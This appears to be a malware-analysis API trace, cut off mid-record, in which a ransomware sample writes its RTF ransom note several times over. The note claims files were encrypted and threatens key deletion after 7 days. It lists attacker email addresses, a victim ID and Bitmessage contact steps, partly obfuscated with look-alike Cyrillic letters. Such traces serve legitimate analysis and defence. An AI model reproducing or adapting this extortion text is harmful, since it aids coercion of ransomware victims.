ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 